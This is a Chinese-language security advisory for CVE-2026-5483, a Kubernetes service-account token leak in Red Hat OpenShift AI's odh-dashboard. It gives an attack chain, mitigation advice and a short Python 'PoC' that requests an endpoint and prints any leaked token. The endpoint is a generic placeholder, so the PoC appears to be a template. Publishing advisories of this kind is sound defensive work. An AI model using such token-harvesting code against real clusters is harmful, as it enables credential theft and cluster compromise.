CVE-2026-5483 CVSS 8.5 高危

CVE-2026-5483 Red Hat OpenShift AI令牌泄露漏洞

披露日期: 2026-04-10

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5483

漏洞类型

敏感信息泄露

CVSS评分

8.5 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Red Hat OpenShift AI (odh-dashboard)

漏洞概述

Red Hat OpenShift AI (RHOAI) 的 odh-dashboard 组件发现严重安全漏洞，允许攻击者通过 Node.js 端点泄露 Kubernetes 服务账户令牌。鉴于该漏洞利用门槛较低且无需用户交互，攻击者可轻易获取敏感令牌，进而未授权访问 Kubernetes 集群资源，对系统机密性、完整性和可用性造成严重影响。

技术细节

该漏洞根因位于 Red Hat OpenShift AI 的 odh-dashboard 组件的 Node.js 实现中。由于特定的 API 端点缺乏严格的访问控制或对响应数据的过滤机制，导致本应保密的运行环境信息被直接暴露。攻击者首先需要在集群内获得低权限用户访问，随后向存在漏洞的 Node.js 端点发起网络请求。该端点在响应中直接包含了 Kubernetes Service Account Token。在 Kubernetes 架构中，Service Account Token 是 Pod 进行身份认证和授权的关键凭证。获取该令牌后，攻击者可以绕过常规的身份验证流程，直接与 Kubernetes API Server 通信。根据该 Service Account 绑定的 Role 和 RoleBinding，攻击者可能获得列出资源、读取 Secrets 甚至执行特权操作的权限，从而导致集群被完全控制。

攻击链分析

STEP 1

1. 初始访问

攻击者获取 Red Hat OpenShift AI 平台的低权限用户访问权限。

STEP 2

2. 漏洞利用

攻击者向 odh-dashboard 中存在缺陷的 Node.js 端点发送特制请求。

STEP 3

3. 权限提升

服务器响应中泄露了 Kubernetes Service Account Token。

STEP 4

4. 系统控制

攻击者利用泄露的令牌冒充服务账户，通过 Kubernetes API 访问或破坏集群资源。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Exploit PoC for CVE-2026-5483
# Description: Exploits the vulnerable NodeJS endpoint in odh-dashboard to leak the K8s Service Account Token.

target_url = "https://<openshift-ai-dashboard-url>/api/v1/vulnerable_endpoint" 
headers = {
    "Authorization": "Bearer <low_priv_token>", # Low privilege user token
    "Content-Type": "application/json"
}

try:
    response = requests.get(target_url, headers=headers, verify=False)
    
    if response.status_code == 200:
        data = response.json()
        # Check if the response structure contains the leaked token
        if 'serviceAccountToken' in data or 'token' in data:
            print("[+] Successfully exploited CVE-2026-5483")
            print("[+] Leaked Kubernetes Service Account Token:")
            print(data.get('token') or data.get('serviceAccountToken'))
        else:
            print("[-] Token not found in response, endpoint might be patched.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")

except Exception as e:
    print(f"[!] Error during exploitation: {e}")

影响范围

Red Hat OpenShift AI (odh-dashboard)

防御指南

临时缓解措施

建议立即升级到 Red Hat 发布的修复版本。在升级前，应严格限制对 OpenShift AI Dashboard 的访问，并检查 Kubernetes 集群日志是否存在异常的 API 访问行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5483
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5483
3 Details https://www.cvedetails.com/cve/CVE-2026-5483/
4 VulDB https://vuldb.com/cve/CVE-2026-5483
5 Link https://access.redhat.com/errata/RHSA-2026:7397
6 Link https://access.redhat.com/errata/RHSA-2026:7398
7 Link https://access.redhat.com/errata/RHSA-2026:7403
8 Link https://access.redhat.com/errata/RHSA-2026:7404
9 Link https://access.redhat.com/security/cve/CVE-2026-5483
10 Link https://bugzilla.redhat.com/show_bug.cgi?id=2454764

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表